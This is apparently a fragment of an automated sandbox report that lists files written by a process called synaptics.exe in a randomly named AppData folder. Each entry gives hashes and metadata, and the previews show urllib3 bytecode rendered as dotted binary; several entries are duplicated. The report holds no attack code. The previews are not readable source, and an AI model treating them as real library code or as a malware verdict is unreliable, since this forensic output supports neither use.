                                                                                                                                                                                                            Preview:o..........gC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5680
                                                                                                                                                                                                            Entropy (8bit):5.125774254026654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:E/rlS5d/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:Ezlod/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                                            MD5:817804A31CB406CBE6DDB5DBDDFAD518
                                                                                                                                                                                                            SHA1:53198B0C538E8C2D46E5D5B890CB50F3B7D2D700
                                                                                                                                                                                                            SHA-256:F9B5E65FBBA45F754B168FAC081411236CDFB7CED6690753A59861ED3F684243
                                                                                                                                                                                                            SHA-512:0AB381BA80BD099F9AD1CBF36970E2C4546FC5018865671699D936C62D88096E24F60FEFEEBCDAFB9A5D04A496BE6AFBAD67625196F34D713A1071BDD343BAA2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16246
                                                                                                                                                                                                            Entropy (8bit):5.259550866587534
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:8gFpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:Daf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                                            MD5:EBDD390A414AA542C0E87994E86181EB
                                                                                                                                                                                                            SHA1:72C144AEB21B10D0CDE4018FF8C115D11E485552
                                                                                                                                                                                                            SHA-256:F575C51745BFB7463195E90F43750846B9E6C4E120940126A65005470E18E98D
                                                                                                                                                                                                            SHA-512:0825AA4AC17F7F32D620B93B5C1603E81CCFFAB7E77101CE1423536FAAAC2C35C9241080360D8637803827A980CDC3E3AC76A332EB2C7EC87023D6887F0F68C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16246
                                                                                                                                                                                                            Entropy (8bit):5.259550866587534
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:8gFpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:Daf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                                            MD5:EBDD390A414AA542C0E87994E86181EB
                                                                                                                                                                                                            SHA1:72C144AEB21B10D0CDE4018FF8C115D11E485552
                                                                                                                                                                                                            SHA-256:F575C51745BFB7463195E90F43750846B9E6C4E120940126A65005470E18E98D
                                                                                                                                                                                                            SHA-512:0825AA4AC17F7F32D620B93B5C1603E81CCFFAB7E77101CE1423536FAAAC2C35C9241080360D8637803827A980CDC3E3AC76A332EB2C7EC87023D6887F0F68C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9089
                                                                                                                                                                                                            Entropy (8bit):5.257189408658693
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:kR6oSXCyaq9B8lhwzOcHtKtABQSMSrcMmh:66oeYq9H6cHTBBMSrcMmh
                                                                                                                                                                                                            MD5:387AE763C8ECF249E8798D221E7E1AAA
                                                                                                                                                                                                            SHA1:5AD8A1F56CF47BCF4B229E064A7E02188A4FFF8D
                                                                                                                                                                                                            SHA-256:B5C7BC77DF900394D106128BFA0102ABB822C3E2F5EED020CC45D544311AEEBC
                                                                                                                                                                                                            SHA-512:DCE5C848D00D2F87E472C48F083AD74162B5E24D4F8625033CDC33B9F52BEA5DC30623C1E9A34443824533A7CF49C20D360D9A8C15CE06E137F5456FC104EB0D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z.e.j.e.j.e.j.e.e.j.e.e.f...f.....e.j.e.e.j.e.e.f...f...f...Z.G.d.d...d...Z.d.S.)......)...annotationsN)...urlencode.....)..._TYPE_BODY)...HTTPHeaderDict)..._TYPE_FIELDS..encode_multipart_formdata)...BaseHTTPResponse..RequestMethodsc....................@...sp...e.Z.d.Z.d.Z.h.d...Z.d%d&d.d...Z.........d'd(d.d...Z.........d)d*d.d...Z.....d+d,d!d"..Z.........d'd-d#d$..Z.d.S.).r....a..... Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):493
                                                                                                                                                                                                            Entropy (8bit):5.405678450564785
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CW2KjR85Yr3auej47+y9pfsxiZ8I4srEkJ:dQwauQ09pfGitrEC
                                                                                                                                                                                                            MD5:726D77681C7EB15EB382403A3EB698F8
                                                                                                                                                                                                            SHA1:EB1734393A41D02830ED3D48C57D08154AF60D10
                                                                                                                                                                                                            SHA-256:D6249A39C9938365FF1D992224C0E3E5D212AB827B55DB1D2BB1FBF7CC2ACB32
                                                                                                                                                                                                            SHA-512:37B8516784A984B2828A687C1CFAA6EA4A201CB5FF511D9BACD93DA6395E00AF642E71F475FC51A8EF57BAC313B4775C0FD707B58985BE229E6AB2EB98BA80F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sh...U.d.Z.e.r.d.d.l.m.Z.m.Z...e.e.e.e.f...d.f...Z.n.e.Z.e.e.d.<.e.e.d.<.e.e.d.<.e.e.d.<.d...Z.Z.d...Z.Z.d.S.).F.....)...Tuple..Union...version..__version__..__version_tuple__..version_tuplez.2.2.3)......r.........N)...TYPE_CHECKING..typingr....r......int..strZ.VERSION_TUPLE..object..__annotations__r....r....r....r......r....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\_version.py..<module>....s..........................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24022
                                                                                                                                                                                                            Entropy (8bit):5.5409125009937705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:m3ovv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:m3odrjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                                            MD5:516A891CE11345DDA1EC4FF8412F1EB7
                                                                                                                                                                                                            SHA1:40E38F69F1DEB61093663ED4F0EBAAE592EC8DA8
                                                                                                                                                                                                            SHA-256:9E5F8138FF4FC3624BEF359AE148F53F35180534BCB2C0C6BD863468E80FB1F6
                                                                                                                                                                                                            SHA-512:C5CD8218FC3028864443D795B6ED24911C27F35F70104FF201BA58F3EEABA1875D3AADAE1F5B3965509C43546C019F628081E14E8034E04506AA4956B7FE1667
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24022
                                                                                                                                                                                                            Entropy (8bit):5.5409125009937705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:m3ovv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:m3odrjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                                            MD5:516A891CE11345DDA1EC4FF8412F1EB7
                                                                                                                                                                                                            SHA1:40E38F69F1DEB61093663ED4F0EBAAE592EC8DA8
                                                                                                                                                                                                            SHA-256:9E5F8138FF4FC3624BEF359AE148F53F35180534BCB2C0C6BD863468E80FB1F6
                                                                                                                                                                                                            SHA-512:C5CD8218FC3028864443D795B6ED24911C27F35F70104FF201BA58F3EEABA1875D3AADAE1F5B3965509C43546C019F628081E14E8034E04506AA4956B7FE1667
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):29210
                                                                                                                                                                                                            Entropy (8bit):5.440536557009661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:/i2lO3Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:KdQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                                            MD5:FA80C2AD10A3B865E9099164602CB9D3
                                                                                                                                                                                                            SHA1:ED515BF16F2CADD94CE21832CBB0C45777718D8E
                                                                                                                                                                                                            SHA-256:55CFC76BADE010FABA12328C0A8D3DC6C2C6767E6FDD798E325C57C725152317
                                                                                                                                                                                                            SHA-512:C3E6F8F58CB4F8E1AFEB7112A5F149E53908F64C6C30C665F4D75D755C45AA90D48A867F80CD4ACF174CA13F3C53D949E0A9DDA074D1E3DBA55ABA9FBC3CB24A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):29210
                                                                                                                                                                                                            Entropy (8bit):5.440536557009661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:/i2lO3Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:KdQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                                            MD5:FA80C2AD10A3B865E9099164602CB9D3
                                                                                                                                                                                                            SHA1:ED515BF16F2CADD94CE21832CBB0C45777718D8E
                                                                                                                                                                                                            SHA-256:55CFC76BADE010FABA12328C0A8D3DC6C2C6767E6FDD798E325C57C725152317
                                                                                                                                                                                                            SHA-512:C3E6F8F58CB4F8E1AFEB7112A5F149E53908F64C6C30C665F4D75D755C45AA90D48A867F80CD4ACF174CA13F3C53D949E0A9DDA074D1E3DBA55ABA9FBC3CB24A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13233
                                                                                                                                                                                                            Entropy (8bit):4.956155799762973
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tNid2MCSNJR3aibXrLh86mCrEl7mRkUfLL2xEZiru/cc8fditjgsShRaE:tEdfCSNJR3aibXrLh86frElCRvTCuUrj
                                                                                                                                                                                                            MD5:9102615399B3EE285CBB779CCEA3F39B
                                                                                                                                                                                                            SHA1:B489795F6E894CE1D1766491E4A7D6A167617DD5
                                                                                                                                                                                                            SHA-256:716D244E343B339A5854C77B7B4B016FADE3D36BC9C6D360A781C3083913F9E4
                                                                                                                                                                                                            SHA-512:611866818181BD220656DC7BFA9CE71A506D4BAF08654E008973EA9A8CB41C4BF6C940CEA6E33C630DEE650A9A39E57AAD67D83BEEB22ADD5BEEF953D57F165B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.$.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.r9d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.j.e.j.d.e.f...e.j.e.d.f...f...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z e Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d ..d e...Z$G.d!d"..d"e...Z%G.d#d$..d$e%e...Z&G.d%d&..d&e%..Z'G.d'd(..d(e'e...Z(G.d)d*..d*e(..Z)G.d+d,..d,e...Z*G.d-d...d.e...Z+G.d/d0..d0e...Z,G.d1d2..d2e-e...Z.G.d3d4..d4e...Z/G.d5d6..d6e...Z0G.d7d8..d8e...Z1G.d9d:..d:e...Z2G.d;d<..d<e2..Z3G.d=d>..d>e2..Z4G.d?d@..d@e2..Z5G.dAdB..dBe2..Z6G.dCdD..dDe...Z7G.dEdF..dFe e-..Z8G.dGdH..dHe...Z9G.dIdJ..dJe.e...Z.G.dKdL..dLe.e...Z:G.dMdN..dNe...Z;G.dOdP..dPe<e0..Z=G.dQdR..dRe-..Z>G.dSdT..dTe...Z?G.dUdV..dVe...Z@d.S.)W.....)...annotationsN)...MessageDefect)...IncompleteRead.....)...HTTPConnection)...ConnectionPool)...HTTPResponse)...Retryc....................@........e.Z.d.Z.d.Z.d.S.)...HT
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9715
                                                                                                                                                                                                            Entropy (8bit):5.406254129187549
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:XIk2H+iSdmq+qOqLpEzqkUS47qJKqtPAK/qPdqqBSqqP:4k2H+iSIq+qOqLOzqA47qJKqtPAK/qP2
                                                                                                                                                                                                            MD5:767E3E00687A11F30A2DE33A1298E448
                                                                                                                                                                                                            SHA1:1576343BFBE58ACEFAA5456E6E175B452C3CC4B2
                                                                                                                                                                                                            SHA-256:6A952DC9C0CFC593CB47EACB17F7A5EB5A4C39D8A3A163CEEEDA0DC5E8246CE7
                                                                                                                                                                                                            SHA-512:EF147B9345C871C826107047728FF93DA640DE8D78E4C13BD413AABE0B65A3F5774E3F4268F7A71AA1D7E976B5119342DCCA450D700A06E9D09AA90B23277338
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g[*.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.e.f...Z.e.j.e.e.j.e.e.f...e.j.e.e.e.f...f...Z...d.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.G.d.d...d...Z.d.S.)......)...annotationsN..application/octet-stream..filename..str | None..default..str..returnc....................C...s....|.r.t...|...d...p.|.S.|.S.).z.. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. r....)...mimetypes..guess_type).r....r......r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\fields.py..guess_content_type....s..........r......name..value.._TYPE_FIELD_VALUEc........................s....d.d.l.}.|.j.d.t.d.d.....t...t...r.....d.....t...f.d.d...d.D.....s=|...d.....d...}.z.|...d.....W.|.S...t.t.f.y<......Y.n.w.t.j.....d.....|...d...........S.).a..... Helper function t
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2345
                                                                                                                                                                                                            Entropy (8bit):5.59428364922348
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:oL1hfLSa7XUyrfcuCKwlb9BEA2GS8FD5yHbVz:SLSaDxc59TEA2CDUHbx
                                                                                                                                                                                                            MD5:3132DE852CA2F3D1039DAA63A3C1F2F8
                                                                                                                                                                                                            SHA1:A426A94A53BCB644F5B1F28C209BD7B117E07E94
                                                                                                                                                                                                            SHA-256:6A457F1F57D7D1E3B4930F3EF477736D9A820BC3D564B9C6DE5FE3FA5B60F466
                                                                                                                                                                                                            SHA-512:F7761A3B8F285FA1E796308E333673A349709EDC2A9130C44D4B032C5424551A04E27D92BB7E73C951254D9F5F939A5365120053BFBDAF1406C50B49F1154439
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
